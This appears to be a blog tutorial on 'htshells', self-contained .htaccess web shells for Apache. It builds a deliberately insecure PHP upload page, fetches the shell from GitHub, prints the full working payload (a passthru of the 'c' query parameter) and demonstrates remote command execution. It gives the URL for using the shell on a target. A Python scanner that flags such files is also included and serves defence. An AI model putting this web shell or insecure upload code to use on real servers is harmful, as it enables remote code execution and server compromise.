Results tagged “htshells” from Just Another Hacker

htshells tutorial

Here is a quick tutorial on how to use the .htaccess shell attack. I did this on a BackTrack 5 VM; the upload example is loosely based on the w3schools PHP file upload example (http://www.w3schools.com/PHP/php_file_upload.asp). The first thing we do is create our vulnerable "application", like this:

root@bt:/var/www# mkdir htshells
root@bt:/var/www# cd htshells/
root@bt:/var/www/htshells# chmod 777 .
root@bt:/var/www/htshells# cat > index.html
<html>
<body>

<form action="upload_file.php" method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file" />
<br />
<input type="submit" name="submit" value="Submit" />
</form>

</body>
</html> 
root@bt:/var/www/htshells# cat > upload_file.php
<?php
if ($_FILES['file']['error'] > 0)
  {
  echo "Error: ".$_FILES['file']['error']."<br />";
  }
else
  {
  echo "Upload: ".$_FILES['file']['name']."<br />";
  echo "Type: ".$_FILES['file']['type']."<br />";
  echo "Size: " . ($_FILES['file']['size'] / 1024) . " Kb<br />";
  echo "Stored in: ".$_FILES['file']['tmp_name']."<br />";
  }
  if (file_exists($_FILES['file']['name']))
  {
      echo $_FILES['file']['name']." already exists.";
  }
  else
  {
      move_uploaded_file($_FILES['file']['tmp_name'],$_FILES['file']['name']);
      echo "Moved to: ".$_FILES['file']['name'];
  }
?> 
Next we have to change the Apache configuration, as BackTrack ships with secure defaults (.htaccess overrides are disabled).

root@bt:/var/www# vim /etc/apache2/sites-enabled/000-default 
Change the AllowOverride argument to All in the /var/www directory block:
        <Directory /var/www/>
                Options Indexes FollowSymLinks MultiViews
                AllowOverride All
                Order allow,deny
                allow from all
        </Directory>
Then start Apache:
root@bt:/var/www/htshells# apache2ctl start
Next we grab and prepare our payload:
root@bt:/var/www/htshells# cd /root
root@bt:~# wget https://github.com/wireghoul/htshells/raw/master/htaccess.php
--2011-06-01 20:16:16--  https://github.com/wireghoul/htshells/raw/master/htaccess.php
Resolving github.com... 207.97.227.239
Connecting to github.com|207.97.227.239|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 536 [text/plain]
Saving to: `htaccess.php'

100%[========================================================================================>] 536         --.-K/s   in 0s      

2011-06-01 20:16:18 (53.1 MB/s) - `htaccess.php' saved [536/536]

root@bt:~# mv htaccess.php .htaccess
root@bt:~# 

Next we visit our demo application in the browser:
[screenshot: upload_form.png]

Select the file to upload (you might have to right-click and select "show hidden files" to see the .htaccess file):
[screenshot: upload_file.png]

Submit the file for upload:
[screenshot: upload success.png]

Now request the .htaccess file and start running commands (the output below is the .htaccess file itself, followed by the command output between the SHELL markers):
root@bt:/var/www/htshells# GET http://localhost/htshells/.htaccess?c=id
# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com

# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
    Order allow,deny
    Allow from all
</Files>

# Make .htaccess file be interpreted as php file. This occur after apache has interpreted 
# the apache directoves from the .htaccess file
AddType application/x-httpd-php .htaccess

###### SHELL ###### 
uid=33(www-data) gid=33(www-data) groups=33(www-data)
###### LLEHS ######
A while back I was testing a CMS that had a curious feature: all uploaded files were placed in their own directory. This was not a security enhancement, as the application allowed PHP files to be uploaded. However, I couldn't help asking: what if PHP uploads had been restricted? The answer was .htaccess files. Using SetHandler in a .htaccess file is well known, but on its own it does not lead to remote code execution. So after some thinking I put together some self-contained .htaccess web shells. I wrote both a PHP and a server-side include shell, but other options can easily be added (JSP, mod_perl, etc.).

This works by first overriding the default Apache access restriction on .ht* files from within the .htaccess file itself, so the file can be requested as a URL. Next we reconfigure the .htaccess extension to be treated as a dynamic content script, and finally we have our payload. The attack works because Apache parses and applies the configuration directives in the .htaccess file before the same file is served as the response to the web request. There is a relatively small gotcha: the payload has to be commented out with a # at the start of the line so it doesn't get interpreted by Apache as a directive, and likewise the script interpreter must ignore the Apache directives. PHP lends itself well to this, as any content not within the <?php ?> tags is presented as is.

# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com

# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>

# Make .htaccess file be interpreted as php file. This occurs after apache has interpreted
# the apache directives from the .htaccess file
AddType application/x-httpd-php .htaccess

# Payload: the leading # hides the line from apache, and PHP ignores everything outside the tags
###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######

Simply upload the preferred shell as a .htaccess file and then visit it via the URL http://domain/path/.htaccess?c=command for remote code execution. The collection of attack files is accessible from my GitHub htshells repository.
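From the defender's side, the mechanism described above (a <Files> block that re-exposes .ht* files, a type/handler directive that turns .htaccess into a script, and a payload hidden behind a leading #) is easy to spot in uploaded content. The following scanner is an added example, not part of the htshells project; it assumes only the standard library, and the sample .htaccess bodies are constructed here to mirror the pattern shown in the post:

```python
import os
import re

# Directives that re-expose .ht* files, which Apache's default config denies.
HT_FILES_BLOCK = re.compile(r'<Files(?:Match)?\s+~?\s*"[^"]*\\\.ht', re.I)
ALLOW_ALL = re.compile(r"^\s*(?:Allow\s+from\s+all|Require\s+all\s+granted)\b",
                       re.I | re.M)
# Type/handler directives that make .htaccess itself run as a script.
SCRIPT_MAP = re.compile(r"^\s*(?:AddType|AddHandler|SetHandler)\s.*"
                        r"(?:php|server-parsed|cgi-script|perl)", re.I | re.M)
# Script tags hidden behind a leading '#', so Apache reads them as a comment.
PAYLOAD = re.compile(r"^\s*#.*(?:<\?php|<\?=|<!--#(?:exec|include))", re.I | re.M)


def analyze_htaccess(text: str) -> dict:
    """Report which indicators of a self-contained .htaccess shell are present."""
    return {
        "ht_files_override": bool(HT_FILES_BLOCK.search(text)
                                  and ALLOW_ALL.search(text)),
        "script_handler": bool(SCRIPT_MAP.search(text)),
        "commented_payload": bool(PAYLOAD.search(text)),
    }


def is_htshell(text: str) -> bool:
    """True when a handler remap and a commented-out payload appear together."""
    ind = analyze_htaccess(text)
    return ind["script_handler"] and ind["commented_payload"]


def scan_tree(root: str) -> list:
    """Return paths of .htaccess files under root that look like htshells."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, encoding="utf-8", errors="replace") as fh:
                if is_htshell(fh.read()):
                    hits.append(path)
    return hits


# Constructed samples: the shell pattern from the post, and a benign file that
# legitimately maps .php to the PHP handler (no payload, so not flagged).
SHELL_SAMPLE = '''<Files ~ "^\\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
###### SHELL ###### <?php /* command payload */ ?> ###### LLEHS ######
'''
BENIGN_SAMPLE = "AddType application/x-httpd-php .php\nRewriteEngine On\n"
```

Run scan_tree() over the upload directory (or the whole document root) from a cron job; a hit on a directory that should not contain a .htaccess file at all is the strongest signal.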

Update: Due to the large number of comments on this post I have created more project information including a FAQ and tutorial under the project page.
This weblog is licensed under a Creative Commons License.